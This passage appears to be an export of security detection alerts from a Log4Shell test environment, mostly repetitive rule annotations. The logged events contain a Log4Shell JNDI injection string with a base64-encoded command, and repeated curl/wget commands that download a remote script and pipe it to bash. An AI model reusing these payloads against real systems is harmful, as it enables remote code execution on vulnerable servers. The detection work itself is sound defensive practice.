CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Ingress Tool Transfer", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Exploitation", annotations._all="T1105", annotations._all="CVE-2021-44228", annotations._all="Stage:Defense Evasion", annotations._all="Source:Endpoint", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", 
annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633812", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:10:12", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="7870", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642647216, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Ingress Tool Transfer", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Exploitation", annotations._all="T1105", annotations._all="CVE-2021-44228", annotations._all="Stage:Defense Evasion", annotations._all="Source:Endpoint", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress 
Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642631700", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T22:35:00", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="7798", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. 
This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642647216, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Ingress Tool Transfer", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Exploitation", annotations._all="T1105", annotations._all="CVE-2021-44228", annotations._all="Stage:Defense Evasion", annotations._all="Source:Endpoint", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642631700", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T22:35:00", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="7798", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", 
savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642646954, search_name="ESCU - Detect Outbound LDAP Traffic - Rule", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Log4Shell CVE-2021-44228\"],\"cis20\":[\"CIS 12\",\"CIS 13\"],\"context\":[\"Source:Endpoint\",\"Stage:Initial Access\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Command and Control\",\"Actions on Objectives\"],\"mitre_attack\":[\"T1190\",\"T1059\"],\"nist\":[\"PR.DS\",\"PR.PT\",\"DE.AE\",\"DE.CM\"],\"observable\":[]}", annotations._all="T1059", annotations._all="DE.AE", annotations._all="Actions on Objectives", annotations._all="PR.PT", annotations._all="CIS 13", annotations._all="Stage:Initial Access", annotations._all="PR.DS", annotations._all="DE.CM", annotations._all="Source:Endpoint", annotations._all="Command and Control", annotations._all="Log4Shell CVE-2021-44228", annotations._all="CVE-2021-44228", annotations._all="CIS 12", annotations._all="T1190", annotations._frameworks="analytic_story", annotations._frameworks="cis20", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations._frameworks="nist", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.cis20="CIS 12", annotations.cis20="CIS 13", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Command and Control", annotations.kill_chain_phases="Actions on Objectives", annotations.mitre_attack="T1190", annotations.mitre_attack="T1059", annotations.nist="PR.DS", annotations.nist="PR.PT", 
annotations.nist="DE.AE", annotations.nist="DE.CM", dest_ip="0:0:0:0:0:ffff:a00:110", earliest_time="2022-01-19T22:34:59", info_max_time="+Infinity", info_min_time="0.000", latest_time="2022-01-20T00:21:41", risk_message="An outbound LDAP connection from 0:0:0:0:0:ffff:a00:114 in your infrastructure connecting to dest ip 0:0:0:0:0:ffff:a00:110", risk_object="0:0:0:0:0:ffff:a00:110", risk_object_type="system", risk_score="56.0", savedsearch_description="Malicious actors often abuse misconfigured LDAP servers or applications that use the LDAP servers in organizations. Outbound LDAP traffic should not be allowed outbound through your perimeter firewall. This search will help determine if you have any LDAP connections to IP addresses outside of private (RFC1918) address space.", src_ip="0:0:0:0:0:ffff:a00:114" 1642646952, search_name="ESCU - Log4Shell JNDI Payload Injection Attempt - Rule", action="Bad Request", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Log4Shell CVE-2021-44228\"],\"cis20\":[\"CIS 3\",\"CIS 5\",\"CIS 16\"],\"context\":[\"Source:Application Log\",\"Stage:Execution\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Reconnaissance\",\"Exploitation\"],\"mitre_attack\":[\"T1190\"],\"nist\":[\"DE.CM\"],\"observable\":[]}", annotations._all="T1190", annotations._all="CVE-2021-44228", annotations._all="Source:Application Log", annotations._all="Reconnaissance", annotations._all="Log4Shell CVE-2021-44228", annotations._all="DE.CM", annotations._all="CIS 16", annotations._all="Stage:Execution", annotations._all="CIS 3", annotations._all="CIS 5", annotations._all="Exploitation", annotations._frameworks="analytic_story", annotations._frameworks="cis20", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations._frameworks="nist", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.cis20="CIS 3", 
annotations.cis20="CIS 5", annotations.cis20="CIS 16", annotations.context="Source:Application Log", annotations.context="Stage:Execution", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Reconnaissance", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1190", annotations.nist="DE.CM", category="application/json", count="2", dest="10.0.1.21", dest_port="80", http_content_type="application/json", http_method="GET", http_referrer="unknown", http_user_agent="curl/7.79.1", info_max_time="+Infinity", info_min_time="0.000", risk_message="CVE-2021-44228 Log4Shell triggered for host 10.0.1.21", risk_object="10.0.1.21", risk_object_type="system", risk_score="15.0", savedsearch_description="CVE-2021-44228 Log4Shell payloads can be injected via various methods, but one of the most common injection vectors is via Web calls. Many of the vulnerable Java web applications that use log4j have a web component and are especially targeted by this injection, specifically projects like Apache Struts, Flink, Druid, and Solr. The exploit is triggered by an LDAP lookup function in the log4j package; its invocation looks like `${jndi:ldap://PAYLOAD_INJECTED}`, and when executed against vulnerable web applications the invocation can be seen in various parts of web logs. Specifically, it has been successfully exploited via headers such as X-Forwarded-For, User-Agent, Referer, and X-Api-Version. In this detection we first limit the scope of our search to the Web Datamodel and use the `| from datamodel` function to benefit from schema-accelerated searching, mainly because the second part of the detection is fairly heavy: it runs a regex across all _raw events looking for the `${jndi:ldap://` pattern in all potential web fields available in the raw data, such as HTTP headers. 
If you see results for this detection, it means that there was an injection attempt, which could be reconnaissance activity or a genuine exploitation attempt, but this does not necessarily mean that the host was actually exploited.", site="localhost", src="${jndi:ldap://10.0.1.16:1389/Basic/Command/Base64/KGN1cmwgaHR0cDovLzguOC44Ljg6ODAvd3AtY29udGVudC90aGVtZXMvdHdlbnR5dGhpcnRlZW4vbTggfHwgd2dldCAtcU8gLSBodHRwOi8vOC44LjguODo4MC93cC1jb250ZW50L3RoZW1lcy90d2VudHl0aGlydGVlbi9tOCl8YmFzaA==}", url="http://10.0.1.21:80/", url_domain="10.0.1.21", user="unknown" 1642646954, search_name="ESCU - Detect Outbound LDAP Traffic - Rule", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Log4Shell CVE-2021-44228\"],\"cis20\":[\"CIS 12\",\"CIS 13\"],\"context\":[\"Source:Endpoint\",\"Stage:Initial Access\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Command and Control\",\"Actions on Objectives\"],\"mitre_attack\":[\"T1190\",\"T1059\"],\"nist\":[\"PR.DS\",\"PR.PT\",\"DE.AE\",\"DE.CM\"],\"observable\":[]}", annotations._all="T1059", annotations._all="DE.AE", annotations._all="Actions on Objectives", annotations._all="PR.PT", annotations._all="CIS 13", annotations._all="Stage:Initial Access", annotations._all="PR.DS", annotations._all="DE.CM", annotations._all="Source:Endpoint", annotations._all="Command and Control", annotations._all="Log4Shell CVE-2021-44228", annotations._all="CVE-2021-44228", annotations._all="CIS 12", annotations._all="T1190", annotations._frameworks="analytic_story", annotations._frameworks="cis20", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations._frameworks="nist", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.cis20="CIS 12", annotations.cis20="CIS 13", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.cve="CVE-2021-44228", 
annotations.kill_chain_phases="Command and Control", annotations.kill_chain_phases="Actions on Objectives", annotations.mitre_attack="T1190", annotations.mitre_attack="T1059", annotations.nist="PR.DS", annotations.nist="PR.PT", annotations.nist="DE.AE", annotations.nist="DE.CM", dest_ip="0:0:0:0:0:ffff:a00:110", earliest_time="2022-01-19T22:34:59", info_max_time="+Infinity", info_min_time="0.000", latest_time="2022-01-20T00:21:41", risk_message="An outbound LDAP connection from 0:0:0:0:0:ffff:a00:114 in your infrastructure connecting to dest ip 0:0:0:0:0:ffff:a00:110", risk_object="0:0:0:0:0:ffff:a00:114", risk_object_type="system", risk_score="56.0", savedsearch_description="Malicious actors often abuse misconfigured LDAP servers or applications that use the LDAP servers in organizations. Outbound LDAP traffic should not be allowed outbound through your perimeter firewall. This search will help determine if you have any LDAP connections to IP addresses outside of private (RFC1918) address space.", src_ip="0:0:0:0:0:ffff:a00:114" 1642646952, search_name="ESCU - Log4Shell JNDI Payload Injection Attempt - Rule", action="Bad Request", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Log4Shell CVE-2021-44228\"],\"cis20\":[\"CIS 3\",\"CIS 5\",\"CIS 16\"],\"context\":[\"Source:Application Log\",\"Stage:Execution\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Reconnaissance\",\"Exploitation\"],\"mitre_attack\":[\"T1190\"],\"nist\":[\"DE.CM\"],\"observable\":[]}", annotations._all="T1190", annotations._all="CVE-2021-44228", annotations._all="Source:Application Log", annotations._all="Reconnaissance", annotations._all="Log4Shell CVE-2021-44228", annotations._all="DE.CM", annotations._all="CIS 16", annotations._all="Stage:Execution", annotations._all="CIS 3", annotations._all="CIS 5", annotations._all="Exploitation", annotations._frameworks="analytic_story", annotations._frameworks="cis20", annotations._frameworks="context", 
annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations._frameworks="nist", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.cis20="CIS 3", annotations.cis20="CIS 5", annotations.cis20="CIS 16", annotations.context="Source:Application Log", annotations.context="Stage:Execution", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Reconnaissance", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1190", annotations.nist="DE.CM", category="application/json", count="2", dest="10.0.1.21", dest_port="80", http_content_type="application/json", http_method="GET", http_referrer="unknown", http_user_agent="curl/7.79.1", info_max_time="+Infinity", info_min_time="0.000", risk_message="CVE-2021-44228 Log4Shell triggered for host 10.0.1.21", risk_object="unknown", risk_object_type="user", risk_score="15.0", savedsearch_description="CVE-2021-44228 Log4Shell payloads can be injected via various methods, but one of the most common injection vectors is via Web calls. Many of the vulnerable Java web applications that use log4j have a web component and are especially targeted by this injection, specifically projects like Apache Struts, Flink, Druid, and Solr. The exploit is triggered by an LDAP lookup function in the log4j package; its invocation looks like `${jndi:ldap://PAYLOAD_INJECTED}`, and when executed against vulnerable web applications the invocation can be seen in various parts of web logs. Specifically, it has been successfully exploited via headers such as X-Forwarded-For, User-Agent, Referer, and X-Api-Version. 
In this detection we first limit the scope of our search to the Web Datamodel and use the `| from datamodel` function to benefit from schema-accelerated searching, mainly because the second part of the detection is fairly heavy: it runs a regex across all _raw events looking for the `${jndi:ldap://` pattern in all potential web fields available in the raw data, such as HTTP headers. If you see results for this detection, it means that there was an injection attempt, which could be reconnaissance activity or a genuine exploitation attempt, but this does not necessarily mean that the host was actually exploited.", site="localhost", src="${jndi:ldap://10.0.1.16:1389/Basic/Command/Base64/KGN1cmwgaHR0cDovLzguOC44Ljg6ODAvd3AtY29udGVudC90aGVtZXMvdHdlbnR5dGhpcnRlZW4vbTggfHwgd2dldCAtcU8gLSBodHRwOi8vOC44LjguODo4MC93cC1jb250ZW50L3RoZW1lcy90d2VudHl0aGlydGVlbi9tOCl8YmFzaA==}", url="http://10.0.1.21:80/", url_domain="10.0.1.21", user="unknown" 1642646916, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Ingress Tool Transfer", annotations._all="Exploitation", annotations._all="T1105", annotations._all="Stage:Defense Evasion", annotations._all="CVE-2021-44228", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Source:Endpoint", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", 
annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642638231", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-20T00:23:51", parent_process_id="8018", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="8020", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642646916, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Ingress Tool Transfer", annotations._all="Exploitation", annotations._all="T1105", annotations._all="Stage:Defense Evasion", annotations._all="CVE-2021-44228", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Source:Endpoint", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", 
annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642638231", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-20T00:23:51", parent_process_id="8018", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="8020", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. 
This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642646916, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Ingress Tool Transfer", annotations._all="Exploitation", annotations._all="T1105", annotations._all="Stage:Defense Evasion", annotations._all="CVE-2021-44228", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Source:Endpoint", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633944", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:12:24", parent_process_id="7877", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="7879", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies 
the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642646916, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Ingress Tool Transfer", annotations._all="Exploitation", annotations._all="T1105", annotations._all="Stage:Defense Evasion", annotations._all="CVE-2021-44228", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Source:Endpoint", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633944", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:12:24", parent_process_id="7877", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="7879", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", 
risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642646916, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Ingress Tool Transfer", annotations._all="Exploitation", annotations._all="T1105", annotations._all="Stage:Defense Evasion", annotations._all="CVE-2021-44228", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Source:Endpoint", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633942", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:12:22", parent_process_id="7870", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="7872", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote 
file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642646916, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Ingress Tool Transfer", annotations._all="Exploitation", annotations._all="T1105", annotations._all="Stage:Defense Evasion", annotations._all="CVE-2021-44228", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Source:Endpoint", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633942", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:12:22", parent_process_id="7870", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="7872", process_name="wget", risk_message="An 
instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642646916, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Ingress Tool Transfer", annotations._all="Exploitation", annotations._all="T1105", annotations._all="Stage:Defense Evasion", annotations._all="CVE-2021-44228", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Source:Endpoint", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642631831", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T22:37:11", parent_process_id="7798", parent_process_name="dash", process="wget -qO - 
http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="7799", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642646916, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Ingress Tool Transfer", annotations._all="Exploitation", annotations._all="T1105", annotations._all="Stage:Defense Evasion", annotations._all="CVE-2021-44228", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Source:Endpoint", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642631831", info_max_time="+Infinity", info_min_time="0.000", 
